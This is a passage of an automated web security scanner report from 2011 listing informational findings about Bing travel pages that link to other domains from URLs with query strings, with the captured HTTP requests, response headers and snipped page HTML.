<h3><a href="http://0.r.redacted/?ld=4vOJQ2dFie1YmD4SYvLn2_M1O_l9EQEOrzExK8-mlXbT075AMwPEj2ORymlISHwrx-GSRCKOQU4xMOlNw9JuR9cJXGcZqaAAP5l-7jBijYfsuEzLFjpyfEHLfwWi7r_jRuZhaL7TmFMrRvQTDnAIHWPeZxO_VN6wPQ6sLbTVINsNKRJARvq8o5_GQhQS6bI5l2apTwTrzU5Pxyz-g2zXT904oY3GftZQUAECKGF84pohT2S-1xfk0zZll6tPoE73f_hvEjTgtn5e46zDzC5UPbaV6czDPEiXTUIuJd2wsac8VgeuxzJWQHvbRQo-LJmj2XBCXE5Ak4lAVW-Dr1YGN0gxW0FIUcMMrmSpc6pfRbO4W6b__FL5EtfrYA730vVjJbLsD4e-A2MUH3ryG6YhTHHTVUCUxFyoSb2g0wepjhTCZduA3pECZjcz2LrvGZtGHExUlH3D-gFiWNfcaudMe7IlKbKqT7h3uVyQ" onmousedown="return si_T('&ID=FD,62.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4v6vCgk3oCadYGZ8YMoFsGfUJbcaeYKK3JfqnWqBzm4KLzpbs2nS6_R_GDQzkRRzpuuKvzqZSceoWEu44I0oSxVBvunwRqcVyh5_o2CBOyFfH5hED0k78jJF5KY00AiuiIM_6V5f9-HcIqSck4o5iadV81xlc22MTumrhxGzTtLqggh9Lv0uuNmCvGOyLSJtKEdJjOzlUpJ0puN6LopqPyHyOZ3CZQGHa9liyMDIr69xrQxTz9mbB3Ohx5GOnTEArNCoLhia1ozgqJLYuwAFiE1zVUCUzxPTnNhqfija63S9XifJXTECZjcz2cDOKdos2tymhO5OQ3ifMBKhsCNO1iu8ap50Uw6qH0QA" onmousedown="return si_T('&ID=FD,64.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://893563.r.msn.com/?ld=4vOaWSnhW_2FnMxyxGtXj8lsMGpqD-gKGjaw0PTnOaNYo1VkkpO9oBWiftFOYzwF5Zyu7Mffp1tEsXnV4rRNyvZYr31Spp7RePYqFNyPe2Q-6G4HMLtnPa7_H8SYDSJrCK39bQ8BfIwaJsR8DOQbwiOmoqI6BUX5eYKD4sB77fhoMKM9vcdkiX0deUl7hetbhEGRgwp8_iMxv6R7og27-eNaz3s_-cd61_arIin7k1nqq0lukstjU6-wc-S28I7gNiVHkENAJvjFF90gOoA_0E3jVUCUy1ntsGh6vI1O84-BAWmgifECZjcz3411hJjFi2EIZQCrbNjlBTHesNk6_HQOa8LZnjQ5-FnQ" onmousedown="return si_T('&ID=FD,66.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vLNHuap9D4Yv5RRrX3KJUosXUKHrN3h7f_1Pz3oGM729SxfQheaR3mYCivzqfjAs45m-hCR_1m_75t_v8eBodyivV2yW73YltdRSSrBbYsUA9AwiDXO9VhFh43fGImo32_d40mgGwtrq_50g9r7oy72tLF8vnb3bniP1duoUYFllI9R_c2br6M7SZ0nzDELIR2CZi8F2y6RFQoqxnrsR70INwlnUxWwpQCihI4QsiBPfv-eIdlFq9Vfzk1nU1pM5pqlZ5pOomiL5vfVoyACnKbTFBYU4y1CUCN1Sb8ilgvnsXH5F02NHoiUnlrknGOKBbQPVFLJy3TZ7AxPO9WNxW5DVUCUx2Zm3k2cp94p6S9yaQ40b_ECZjcz2OsNdR8CJL1_f60Ftgo8M6e3ntBHjU2jCoBSkkGc5z4w" onmousedown="return si_T('&ID=FD,68.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vx6-Gyx8_37lrqotWhsnakfUmnda0sYFaEoOtH75yFfxs_FzHf80HSWSsx6nAR7Mtr6uXXEmXW5qN0QXNLqLihNxG0jgCWKCi8-j8C1outxDHa_OVWjFjMEkJvIPVz18vZ9osxY4I8Kc7yqA9S3Iiswpp-mqK4Ag-ifWFR9T0fd3BaIIBKz8Y8VBxC-J7Zt8KRcZaIoDYk7zqqwws4D-9Efegh664_f-WFEhENJquZQcI54X55x_jIroWY9uOto1Q2FBpWqFT3UwwlGBdkTXAtPzt-_qEpMAn5PcA2rBuCJXyCr1VPtPrFvt6DLRT33kcjvNoKYVDoUaVOtEQD7_kQGCREEpx5-qv5jL5_Agn2lmcX9NSEdjATgnz3d39VH2Ces8NLWGIpNO64t4kgs0IxTVUCUyJkk1DniG_6utZtYbOu8ZjECZjcz2HE_FnGmqSNZI1_1f5ZfotTMwiLIcBdP8Tkko-alW9ag" onmousedown="return si_T('&ID=FD,70.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://822761.r.msn.com/?ld=4vAbsQiNPDVwdmk5aizBmpT2hjeZnYkfnymGjYkISYz5qGIWT7osk058ydRjVfJ1NEJ8u2aa5My1ChOtz63x7xiSAmnSBaIqINzJlFI_n-wj6j2KKF6m85FO-JXfLSI74sIVLMbbjyvP0BPG3WQkarzspCpNfkA0YyvaX24iralxQ_DGlxIIgYJdKjCflF-BddicrAEhLnjyZ3uBG-NTOkdzVUCUzctsPy20DUwFXfY2iRUlWWECZjcz3YdPr5QRRwPhpbgEA_Ard3hBx52CKS6ATYEC0rh0j6Yg" onmousedown="return si_T('&ID=FD,72.1,Ads')">Tankini <strong>
...[SNIP]...
<h3><a href="http://6766.r.msn.com/?ld=4v1V6riJb29HvWXV4XOgZVTH2REZ3jVeqkWB1JkqpGivjz4O0BZhMK74AmJES9_Gwkvo0bUdsxa3CyaRlxmifg0kaDqfks0F5R3AfPwoDM19xVAfJwMqiPgsyoJydWLg4RjkN3pSXRVwFAu5Kmopc2ZcCD_vpjDwHbjC_I6snCrWp0COogel0wycHFQ4EMgywvNhETFE-YMZHUKqeY1l1KHKoJkZrkRVJnO0ktPA8av-_aTEdrD3rZBF_1nLJyTMR9tjNi92Y6wJkColk1bx0go93Sna9Ij0ymoLjIWbVUKkU1VAlMOgKthCX7UakSrubcshsBLBAmY3M9qN-wBk-aw80zCLIUw8KPdmuw-0s_z08x8wMO-7z24yQ" onmousedown="return si_T('&ID=FD,74.1,Ads')"><strong>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&ID=FD,56.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,239.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,241.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,243.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,245.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,247.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,249.1')">Help</a> | </li><li><a href="https://feedback.discoverbing.com/default.aspx?locale=en-US&productkey=bingshopping&P1=dsatcommerce&P2=plus-size%20swimwear&P3=0&P4=SHOPH1&P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&P6=&P7=Original&P8=&P9=0.0/0.0&P10=0.0&P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fswimwear%2fc%2f4503%3fq%3dplus-size%2bswimwear%26FORM%3dSHOPH1%26crea%3d012911swimwear&P12=&searchtype=Commerce+Answer&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fswimwear%2fc%2f4503%3fq%3dplus-size%2520swimwear%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=FD,251.1')">Tell us what you think</a>
...[SNIP]...

22.393. http://www.bing.com/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV

The response contains the following links to other domains:

http://ad.doubleclick.net/clk;201900517;26579808;j?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PKH&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=ski
http://ad.doubleclick.net/clk;201900520;26579808;d?http://www.orbitz.com/App/PrepareDealsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=dealspage
http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=HI&cnt=PRO
http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=vacation-rentals&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=rentals
http://ad.doubleclick.net/clk;214236123;36139234;u?http://www.orbitz.com/App/DisplayCarSearch?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cars
http://ad.doubleclick.net/clk;214236160;36139297;e?http://cruises.orbitz.com?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cruises
http://ad.doubleclick.net/clk;214236226;36139480;b?http://www.orbitz.com/App/PrepareVacationsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=vacations
http://ads1.redacted/library/dap.js
http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://moneycentral.msn.com/investor/market/currencyconverter.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx
http://twitter.com/fareologist
http://www.facebook.com/Bing?v=app_131774473518765
http://www.redacted/

Request

GET /travel/?cid=msn_nav_lifestyle&FORM=MSNNAV HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 80669
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:53 GMT
Connection: close
Set-Cookie: lbc=812; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z7vsg9a6jq3f3uyz4cnhuieam4ulo_VID-4gvhc6ts2kj4myz6buj3ufvs84q5_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:52 GMT; Path=/travel
Set-Cookie: JSESSIONID=5CD7FF5F8D311758E2B9C1555DFBD530; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=41B19621CE894C38863D5EE299D59212; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:52 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2f0a19890f3a47f2ba784890d09571ca; expires=Tue, 29-Jan-2013 17:07:52 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:53 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,79.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,81.1')">Hotmail</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236123;36139234;u?http://www.orbitz.com/App/DisplayCarSearch?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cars" target="_cars" class="FCEVENT_track_DOBUBBLE_BookingModule-link1">Cars</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236160;36139297;e?http://cruises.orbitz.com?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cruises" target="_cruises" class="FCEVENT_track_DOBUBBLE_BookingModule-link2">Cruises</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236226;36139480;b?http://www.orbitz.com/App/PrepareVacationsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=vacations" target="_vacations" class="FCEVENT_track_DOBUBBLE_BookingModule-link3">Vacations</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900517;26579808;j?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PKH&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=ski" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link1">Save up to 40% on ski packages</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=HI&cnt=PRO" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link2">Great deals to Hawaii</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=vacation-rentals&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=rentals" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link3">Find the perfect vacation rental</a>
...[SNIP]...
<li class="more deals">
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900520;26579808;d?http://www.orbitz.com/App/PrepareDealsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=dealspage" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link4">More top deals by <img src="images/orbitzLogoSmall.gif">
...[SNIP]...
<li>
       <a rel="nofollow" href="http://twitter.com/fareologist" class="FCEVENT_track_DOBUBBLE_Tools-link1">Bing travel on Twitter</a>
...[SNIP]...
<li>
       <a rel="nofollow" href="http://www.facebook.com/Bing?v=app_131774473518765" class="FCEVENT_track_DOBUBBLE_Tools-link2">Bing travel on Facebook</a>
...[SNIP]...
<li>
       <a rel="nofollow" href="http://redacted/investor/market/currencyconverter.aspx" class="FCEVENT_track_DOBUBBLE_Tools-link5">Currency converter</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,92.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,94.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,96.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,98.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,100.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,102.1')">Help</a>
...[SNIP]...

22.394. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://adsyndication.msn.com/delivery/getads.js
http://advertising.microsoft.com/advertise-on-bing
http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4709092502668224&mkt=en-US&w=fc9a562c,f175cd72
http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4789687561289752&mkt=en-US&w=6a939d85,c76c6c0c
http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4905673155414425&mkt=en-US&w=b201eb24,83604eb8
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://grandelylodge.com/
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx
http://www.budgettravel.com/
http://www.budgettravel.com/bt-srv/gallery/0906_HotelPools/index.html?jumpToPic=0
http://www.budgettravel.com/bt-srv/gallery/0908_WeirdestHotels/index.html?jumpToPic=0
http://www.discoverbing.com/get/set-bing-as-your-homepage-2
http://www.discoverourtown.com/MN/Ely/Lodging-3459.html
http://www.ely.org/
http://www.facebook.com/plugins/like.php?href=http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&layout=standard&show_faces=false&width=250&action=like&colorscheme=dark&height=35
http://www.redacted/

Request

GET /travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 46219
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:06 GMT
Connection: close
Set-Cookie: JSESSIONID=5831CBDBB8382C06716441670216A316; Path=/travel
Set-Cookie: _SS=SID=AD194B1D8163435D90F9C42BAACCA3C7; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2b67e617c3464e858cbe39668b3c119f; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/


...[SNIP]...
</script>


<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,71.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,73.1')">Hotmail</a>
...[SNIP]...
<br/>
<a xmlns="" tabindex="20" href="http://www.discoverbing.com/get/set-bing-as-your-homepage-2">
<strong xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
</div>


                                                                                            <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&layout=standard&show_faces=false&width=250&action=like&colorscheme=dark&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="attribution">


                <a href="http://www.budgettravel.com" tabindex="60">
                   <img src="http://www.bing.com/travel//content/static/br-images/image-aHR0cDovL2JsdWJlZGJ1aWEwMTo4My9pL0Y0L0MwOUE0NzRBMjc4QjVCMEFDNjBDQjgwRjlDREU4LmdpZg.gif" a
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/0906_HotelPools/index.html?jumpToPic=0">Budget Travel: The World’s Most Amazing Hotel Pools </a>
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/0908_WeirdestHotels/index.html?jumpToPic=0">Budget Travel: World’s Weirdest Hotels</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.ely.org/">Ely, MN Chamber Of Commerce – Boundary Waters Canoe Area ...</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4709092502668224&mkt=en-US&w=fc9a562c,f175cd72">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.discoverourtown.com/MN/Ely/Lodging-3459.html">Bed and Breakfast Ely MN Minnesota Hotels, Vacation Rentals ...</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4789687561289752&mkt=en-US&w=6a939d85,c76c6c0c">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://grandelylodge.com/">Ely Minnesota Resorts Family Vacations Fishing & Golf MN</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4905673155414425&mkt=en-US&w=b201eb24,83604eb8">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,84.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,86.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,88.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,90.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,92.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,94.1')">Help</a>
...[SNIP]...

22.395. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://adsyndication.msn.com/delivery/getads.js
http://advertising.microsoft.com/advertise-on-bing
http://cc.bingj.com/cache.aspx?q=travel+tips&d=4533862134120560&mkt=en-US&w=9d06dd8b,b3578fe6
http://cc.bingj.com/cache.aspx?q=travel+tips&d=4631074424554800&mkt=en-US&w=435c5f1a,279d08d0
http://cc.bingj.com/cache.aspx?q=travel+tips&d=4703186920408955&mkt=en-US&w=786474fe,c4331006
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx
http://travel.state.gov/travel/tips/tips_1232.html
http://www.alltraveltips.com/
http://www.budgettravel.com/bt-dyn/content/article/2010/11/24/AR2010112403746.html
http://www.budgettravel.com/bt-reg/PrepareNewReg.do?source=newsletter
http://www.budgettravel.com/bt-srv/gallery/1011_WinterBeachRetreats/index.html?jumpToPic=0
http://www.discoverbing.com/get/set-bing-as-your-homepage-1/?form=MFEHPG&publ=BINGCOM&crea=TEXT_MFEHPG_Defaults_TravelSlide_kk1001_1x1
http://www.redacted/
http://www.tsa.gov/travelers/airtravel/assistant/index.shtm

Request

GET /travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 42436
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:33 GMT
Connection: close
Set-Cookie: JSESSIONID=B12A2B796782B2243917D1037B967CBB; Path=/travel
Set-Cookie: _SS=SID=6003A84770B14256A16FA9049752AF35; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ced98565d99974968bdaf56380e0a3d40; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

...[SNIP]...
</script>


<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,57.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,59.1')">Hotmail</a>
...[SNIP]...
<strong>
<a xmlns="" tabindex="20" href="http://www.discoverbing.com/get/set-bing-as-your-homepage-1/?form=MFEHPG&publ=BINGCOM&crea=TEXT_MFEHPG_Defaults_TravelSlide_kk1001_1x1">Always find what you're looking for. Make Bing your homepage.</a>
...[SNIP]...
<div class="partnerLink">
<a href="http://www.budgettravel.com/bt-reg/PrepareNewReg.do?source=newsletter">Get travel deals and more from Budget Travel</a>
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/1011_WinterBeachRetreats/index.html?jumpToPic=0">Budget Travel: America’s 10 Best Winter Beach Retreats</a>
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-dyn/content/article/2010/11/24/AR2010112403746.html">Budget Travel: Why Is the TSA Questioning Me?</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.alltraveltips.com/">Best Travel Tips, Travel Secrets Revealed</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=travel+tips&d=4703186920408955&mkt=en-US&w=786474fe,c4331006">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://travel.state.gov/travel/tips/tips_1232.html">Tips for Traveling Abroad</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=travel+tips&d=4631074424554800&mkt=en-US&w=435c5f1a,279d08d0">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.tsa.gov/travelers/airtravel/assistant/index.shtm">TSA: Travel Assistant</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=travel+tips&d=4533862134120560&mkt=en-US&w=9d06dd8b,b3578fe6">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,70.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,78.1')">About our ads</a>
